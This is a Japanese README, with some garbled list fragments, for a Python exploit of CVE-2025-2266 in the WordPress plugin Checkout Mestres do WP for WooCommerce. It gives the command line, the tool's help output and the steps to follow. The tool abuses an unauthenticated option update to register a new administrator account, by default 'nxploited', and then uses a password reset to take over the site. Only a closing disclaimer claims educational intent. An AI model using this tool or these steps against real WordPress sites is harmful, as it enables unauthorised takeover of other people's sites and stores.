
Checkout Mestres do WP for WooCommerce 8.6.5 - 8.7.5 - 未認証の任意オプション更新
WordPress 用プラグイン Checkout Mestres do WP for WooCommerce は、バージョン 8.6.5 から 8.7.5 までにおいて、未認証の任意オプション更新の脆弱性 の影響を受けます。
脆弱な関数 cwmpUpdateOptions() は適切な権限チェックが行われないため、未認証の攻撃者 が WordPress の任意のオプションを更新できる可能性があります。
攻撃者は以下のことが可能です:
administrator に設定する。CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hこの Python スクリプトは、以下のことを行うために脆弱性を悪用します:
administrator を割り当てる。requests モジュール(pip install requests でインストール)8.6.5 – 8.7.5)がインストールされた WordPress サイトスクリプトは、以下を介してプラグインのバージョンを確認します:
/wp-content/plugins/checkout-mestres-wp/readme.txt
プラグインが脆弱な場合:
管理者権限を持つ新しいユーザー(デフォルト:nxploited)を登録します。
python CVE-2025-2266.py -u http://target.com/wordpress -newuser adminx -email [email protected]
| Option | 説明 |
|---|---|
-u, --url | 対象の WordPress サイト URL(必須) |
-newuser | 新しい管理者ユーザーを作成(デフォルトのユーザー名:nxploited) |
-email | 新しいユーザーのメールアドレス(デフォルト:[email protected]) |
usage: CVE-2025-2266.py [-h] -u URL [-newuser [NEWUSER]] [-email [EMAIL]]
CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit
By : Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://example.com/wordpress)
-newuser [NEWUSER] Create new admin user (default username: nxploited)
-email [EMAIL] Email for new user (default: [email protected])
ユーザーが作成されたら:
ログインページにアクセスします:
http://target.com/wordpress/wp-login.php
「パスワードをお忘れですか?」 をクリックします。
[email protected])。パスワードを設定し、完全な管理者アクセスを取得します 🎯
エクスプロイト作成:Nxploited | Khaled Alenazi
⚠️ このスクリプトは教育および認可されたテスト目的のみで使用してください。